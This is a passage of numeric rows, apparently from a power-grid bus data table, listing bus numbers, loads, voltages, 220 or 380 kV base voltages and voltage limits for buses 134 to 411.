[134, 1, 42.379723, 8.475945, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [135, 1, 42.435912, 8.487182, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [136, 1, 41.10892, 8.221784, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [137, 1, 32.883352, 6.57667, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [138, 1, 0, 0, 0, 0, 0, 0.999817, 0, 380.0, 0, 1.1, 0.9 ], [139, 1, 64.415154, 12.883031, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [140, 1, 44.545837, 8.909167, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [141, 1, 52.778954, 10.555791, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [142, 1, 58.075691, 11.615138, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [143, 1, 0, 0, 0, 0, 0, 0.999989, 0, 380.0, 0, 1.1, 0.9 ], [144, 1, 52.900949, 10.58019, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [145, 1, 153.890262, 30.778052, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [146, 1, 198.393496, 39.678699, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [147, 1, 121.603531, 24.320706, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [148, 1, 171.604906, 34.320981, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [149, 1, 110.632441, 22.126488, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [150, 1, 144.442139, 28.888428, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [151, 1, 34.037569, 6.807514, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [152, 1, 70.658464, 14.131693, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [153, 1, 126.066192, 25.213238, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [154, 1, 129.494996, 25.898999, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [155, 1, 134.880483, 26.976097, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [156, 1, 0, 0, 0, 0, 0, 0.999993, 0, 380.0, 0, 1.1, 0.9 ], [157, 1, 0, 0, 0, 0, 0, 1.00122, 0, 380.0, 0, 1.1, 0.9 ], [158, 1, 35.536515, 7.107303, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [159, 1, 0, 0, 0, 0, 0, 1.001312, 0, 380.0, 0, 1.1, 0.9 ], [160, 1, 0, 0, 0, 0, 0, 1.000003, 0, 380.0, 0, 1.1, 0.9 ], [161, 1, 110.32053, 22.064106, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [162, 1, 164.896498, 32.9793, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [163, 1, 32.977742, 6.595548, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [164, 1, 33.110366, 6.622073, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [165, 1, 0, 0, 0, 0, 0, 1.000027, 0, 380.0, 0, 1.1, 0.9 ], [166, 1, 38.711374, 7.742275, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [167, 1, 54.457159, 10.891432, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [168, 1, 37.166316, 7.433263, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [169, 1, 127.231016, 25.446203, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [170, 1, 95.60338, 19.120676, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [171, 1, 81.597449, 16.31949, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [172, 1, 40.045805, 8.009161, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [173, 1, 38.255596, 7.651119, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [174, 1, 57.407943, 11.481589, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [175, 1, 38.230523, 7.646105, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [176, 1, 133.219179, 26.643836, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [177, 1, 21.723328, 4.344666, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [178, 1, 115.052075, 23.010415, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [179, 1, 42.392719, 8.478544, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [180, 1, 37.264285, 7.452857, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [181, 1, 28.126009, 5.625202, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [182, 1, 1.274121, 0.254824, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [183, 1, 381.384593, 76.276919, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [184, 1, 0, 0, 0, 0, 0, 1.00007, 0, 380.0, 0, 1.1, 0.9 ], [185, 1, 81.55689, 16.311378, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [186, 1, 43.917961, 8.783592, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [187, 1, 25.687535, 5.137507, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [188, 1, 38.230523, 7.646105, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [189, 1, 140.282058, 28.056412, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [190, 1, 185.549268, 37.109854, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [191, 1, 0, 0, 0, 0, 0, 0.999997, 0, 380.0, 0, 1.1, 0.9 ], [192, 1, 44.685884, 8.937177, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [193, 1, 38.168855, 7.633771, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [194, 1, 26.348571, 5.269714, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [195, 1, 0, 0, 0, 0, 0, 0.999999, 0, 380.0, 0, 1.1, 0.9 ], [196, 1, 36.96551, 7.393102, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [197, 1, 58.566944, 11.713389, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [198, 1, 34.656781, 6.931356, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [199, 1, 44.619452, 8.92389, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [200, 1, 38.231411, 7.646282, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [201, 1, 0, 0, 0, 0, 0, 0.997385, 0, 380.0, 0, 1.1, 0.9 ], [202, 1, 39.176344, 7.835269, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [203, 1, 5.161835, 1.032367, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [204, 1, 151.292335, 30.258467, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [205, 1, 75.652978, 15.130596, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [206, 1, 36.308142, 7.261628, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [207, 1, 107.964778, 21.592956, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [208, 1, 31.79137, 6.358274, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [209, 1, 44.178894, 8.835779, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [210, 1, 50.753281, 10.150656, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [211, 1, 178.358405, 35.671681, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [212, 1, 44.703018, 8.940604, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [213, 1, 209.557758, 41.911552, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [214, 1, 141.005808, 28.201162, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [215, 1, 298.163818, 59.632764, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [216, 1, 100.536884, 20.107377, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [217, 1, 32.215588, 6.443118, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [218, 1, 98.14591, 19.629182, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [219, 1, 157.732439, 31.546488, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [220, 1, 0, 0, 0, 0, 0, 0.999926, 0, 380.0, 0, 1.1, 0.9 ], [221, 1, 89.978961, 17.995792, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [222, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [223, 1, 89.17472, 17.834944, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [224, 1, 103.697914, 20.739583, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [225, 1, 186.195554, 37.239111, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [226, 1, 65.04386, 13.008772, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [227, 1, 81.031459, 16.206292, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [228, 1, 79.44887, 15.889774, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [229, 1, 175.806799, 35.16136, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [230, 1, 42.16851, 8.433702, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [231, 1, 0, 0, 0, 0, 0, 1.000758, 0, 380.0, 0, 1.1, 0.9 ], [232, 1, 0, 0, 0, 0, 0, 0.999968, 0, 380.0, 0, 1.1, 0.9 ], [233, 1, 0, 0, 0, 0, 0, 0.99981, 0, 380.0, 0, 1.1, 0.9 ], [234, 1, 150.208924, 30.041785, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [235, 1, 48.84594, 9.769188, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [236, 1, 0, 0, 0, 0, 0, 0.999977, 0, 380.0, 0, 1.1, 0.9 ], [237, 1, 0.404256, 0.080851, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [238, 1, 55.27007, 11.054014, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [239, 1, 76.362532, 15.272506, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [240, 1, 481.680205, 96.336041, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [241, 1, 356.426619, 71.285324, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [242, 1, 129.781382, 25.956276, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [243, 1, 104.707695, 20.941539, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [244, 1, 124.751441, 24.950288, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [245, 1, 0, 0, 0, 0, 0, 1.001305, 0, 380.0, 0, 1.1, 0.9 ], [246, 1, 0, 0, 0, 0, 0, 0.999932, 0, 380.0, 0, 1.1, 0.9 ], [247, 1, 24.756219, 4.951244, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [248, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [249, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [250, 1, 0, 0, 0, 0, 0, 0.999997, 0, 380.0, 0, 1.1, 0.9 ], [251, 1, 61.439319, 12.287864, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [252, 1, 157.563747, 31.512749, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [253, 1, 69.176497, 13.835299, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [254, 1, 22.086908, 4.417382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [255, 1, 108.621571, 21.724314, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [256, 1, 124.570042, 24.914008, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [257, 1, 60.120258, 12.024052, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [258, 1, 195.924659, 39.184932, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [259, 1, 0, 0, 0, 0, 0, 0.999474, 0, 380.0, 0, 1.1, 0.9 ], [260, 1, 121.935811, 24.387162, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [261, 1, 0, 0, 0, 0, 0, 1.002014, 0, 380.0, 0, 1.1, 0.9 ], [262, 1, 0, 0, 0, 0, 0, 1.000013, 0, 380.0, 0, 1.1, 0.9 ], [263, 1, 174.916762, 34.983352, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [264, 1, 226.439183, 45.287837, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [265, 1, 0, 0, 0, 0, 0, 1.000011, 0, 380.0, 0, 1.1, 0.9 ], [266, 1, 109.128602, 21.82572, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [267, 1, 138.024005, 27.604801, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [268, 1, 47.996795, 9.599359, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [269, 1, 38.543226, 7.708645, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [270, 1, 0, 0, 0, 0, 0, 1.000001, 0, 380.0, 0, 1.1, 0.9 ], [271, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [272, 1, 0.786424, 0.157285, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [273, 1, 107.543822, 21.508764, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [274, 1, 209.051022, 41.810204, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [275, 1, 39.135493, 7.827099, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [276, 1, 152.560099, 30.51202, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [277, 1, 0, 0, 0, 0, 0, 0.999582, 0, 380.0, 0, 1.1, 0.9 ], [278, 1, 119.098098, 23.81962, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [279, 1, 0, 0, 0, 0, 0, 0.999567, 0, 380.0, 0, 1.1, 0.9 ], [280, 1, 0, 0, 0, 0, 0, 0.999608, 0, 380.0, 0, 1.1, 0.9 ], [281, 1, 157.314324, 31.462865, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [282, 1, 222.466817, 44.493363, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [283, 1, 89.17436, 17.834872, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [284, 1, 135.281634, 27.056327, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [285, 1, 60.330863, 12.066173, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [286, 1, 126.443744, 25.288749, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [287, 1, 77.715103, 15.543021, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [288, 1, 49.985813, 9.997163, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [289, 1, 78.613187, 15.722637, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [290, 1, 0, 0, 0, 0, 0, 1.004371, 0, 380.0, 0, 1.1, 0.9 ], [291, 1, 51.734409, 10.346882, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [292, 1, 101.992018, 20.398404, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [293, 1, 89.889422, 17.977884, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [294, 1, 23.954173, 4.790835, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [295, 1, 50.120473, 10.024095, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [296, 1, 142.29214, 28.458428, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [297, 1, 149.550635, 29.910127, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [298, 1, 78.965708, 15.793142, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [299, 1, 76.477763, 15.295553, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [300, 1, 208.346135, 41.669227, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [301, 1, 0, 0, 0, 0, 0, 0.999864, 0, 380.0, 0, 1.1, 0.9 ], [302, 1, 175.506132, 35.101226, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [303, 1, 90.145039, 18.029008, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [304, 1, 77.407608, 15.481522, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [305, 1, 0, 0, 0, 0, 0, 0.999687, 0, 380.0, 0, 1.1, 0.9 ], [306, 1, 0, 0, 0, 0, 0, 1.001376, 0, 380.0, 0, 1.1, 0.9 ], [307, 1, 91.812617, 18.362523, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [308, 1, 113.192724, 22.638545, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [309, 1, 185.199215, 37.039843, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [310, 1, 0, 0, 0, 0, 0, 1.000194, 0, 380.0, 0, 1.1, 0.9 ], [311, 1, 157.309876, 31.461975, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [312, 1, 70.746628, 14.149326, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [313, 1, 0, 0, 0, 0, 0, 1.000053, 0, 380.0, 0, 1.1, 0.9 ], [314, 1, 219.128022, 43.825604, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [315, 1, 0, 0, 0, 0, 0, 1.001459, 0, 380.0, 0, 1.1, 0.9 ], [316, 1, 85.857208, 17.171442, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [317, 1, 115.603585, 23.120717, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [318, 1, 189.979367, 37.995873, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [319, 1, 6.80582, 1.361164, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [320, 1, 0, 0, 0, 0, 0, 0.999999, 0, 380.0, 0, 1.1, 0.9 ], [321, 1, 160.994306, 32.198861, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [322, 1, 20.495611, 4.099122, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [323, 1, 2.132394, 0.426479, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [324, 1, 376.955654, 75.391131, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [325, 1, 122.794929, 24.558986, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [326, 1, 9.955832, 1.991166, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [327, 1, 85.676729, 17.135346, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [328, 1, 146.006315, 29.201263, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [329, 1, 219.606513, 43.921303, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [330, 1, 0, 0, 0, 0, 0, 1.001846, 0, 380.0, 0, 1.1, 0.9 ], [331, 1, 17.43601, 3.487202, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [332, 1, 0, 0, 0, 0, 0, 0.998233, 0, 380.0, 0, 1.1, 0.9 ], [333, 1, 183.204777, 36.640955, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [334, 1, 0, 0, 0, 0, 0, 0.999938, 0, 380.0, 0, 1.1, 0.9 ], [335, 1, 186.974297, 37.394859, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [336, 1, 0, 0, 0, 0, 0, 0.998658, 0, 380.0, 0, 1.1, 0.9 ], [337, 1, 74.372893, 14.874579, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [338, 1, 201.8586, 40.37172, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [339, 1, 124.846752, 24.96935, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [340, 1, 105.555406, 21.111081, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [341, 1, 95.424196, 19.084839, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [342, 1, 165.52958, 33.105916, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [343, 1, 90.811941, 18.162388, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [344, 1, 227.687287, 45.537457, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [345, 1, 248.967083, 49.793417, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [346, 1, 247.160841, 49.432168, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [347, 1, 86.436436, 17.287287, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [348, 1, 225.950537, 45.190107, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [349, 1, 0, 0, 0, 0, 0, 1.001171, 0, 380.0, 0, 1.1, 0.9 ], [350, 1, 118.53695, 23.70739, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [351, 1, 0, 0, 0, 0, 0, 1.000931, 0, 380.0, 0, 1.1, 0.9 ], [352, 1, 784.630953, 156.926191, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [353, 1, 2.358863, 0.471773, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [354, 1, 16.02591, 3.205182, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [355, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [356, 1, 0.0, 0.0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [357, 1, 0.040172, 0.008034, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [358, 1, 0, 0, 0, 0, 0, 1.001232, 0, 380.0, 0, 1.1, 0.9 ], [359, 1, 2.345495, 0.469099, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [360, 1, 0, 0, 0, 0, 0, 1.00076, 0, 380.0, 0, 1.1, 0.9 ], [361, 1, 60.030825, 12.006165, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [362, 1, 171.118921, 34.223784, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [363, 1, 251.942508, 50.388502, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [364, 1, 59.442366, 11.888473, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [365, 1, 53.35268, 10.670536, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [366, 1, 105.744842, 21.148968, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [367, 1, 51.112664, 10.222533, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [368, 1, 25.168716, 5.033743, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [369, 1, 20.681978, 4.136396, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [370, 1, 60.888335, 12.177667, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [371, 1, 306.363294, 61.272659, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [372, 1, 177.664476, 35.532895, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [373, 1, 119.888117, 23.977623, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [374, 1, 61.476597, 12.295319, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [375, 1, 201.664582, 40.332916, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [376, 1, 221.188065, 44.237613, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [377, 1, 158.278763, 31.655753, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [378, 1, 157.974109, 31.594822, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [379, 1, 54.446909, 10.889382, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [380, 1, 0, 0, 0, 0, 0, 1.001302, 0, 380.0, 0, 1.1, 0.9 ], [381, 1, 182.073784, 36.414757, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [382, 1, 0, 0, 0, 0, 0, 1.000851, 0, 380.0, 0, 1.1, 0.9 ], [383, 1, 0, 0, 0, 0, 0, 0.999343, 0, 380.0, 0, 1.1, 0.9 ], [384, 1, 64.249315, 12.849863, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [385, 1, 81.095246, 16.219049, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [386, 1, 65.157599, 13.03152, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [387, 1, 132.696111, 26.539222, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [388, 1, 712.576175, 142.515235, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [389, 1, 0, 0, 0, 0, 0, 0.999941, 0, 380.0, 0, 1.1, 0.9 ], [390, 1, 58.835748, 11.76715, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [391, 1, 67.018935, 13.403787, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [392, 1, 128.608662, 25.721732, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [393, 1, 160.608157, 32.121631, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [394, 1, 57.766136, 11.553227, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [395, 1, 80.060296, 16.012059, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [396, 1, 56.705888, 11.341178, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [397, 1, 454.718762, 90.943752, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [398, 1, 196.948518, 39.389704, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [399, 1, 83.914413, 16.782883, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [400, 1, 44.708193, 8.941639, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [401, 1, 0, 0, 0, 0, 0, 1.000664, 0, 380.0, 0, 1.1, 0.9 ], [402, 1, 0, 0, 0, 0, 0, 1.000457, 0, 380.0, 0, 1.1, 0.9 ], [403, 1, 22.198658, 4.439732, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [404, 1, 78.207244, 15.641449, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [405, 1, 589.605305, 117.921061, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [406, 1, 44.672797, 8.934559, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [407, 1, 88.430781, 17.686156, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [408, 1, 255.692228, 51.138446, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [409, 1, 0, 0, 0, 0, 0, 0.999974, 0, 380.0, 0, 1.1, 0.9 ], [410, 1, 33.104448, 6.62089, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [411, 1, 31.301611, 6.260322, 0, 0, 0, 1.0, 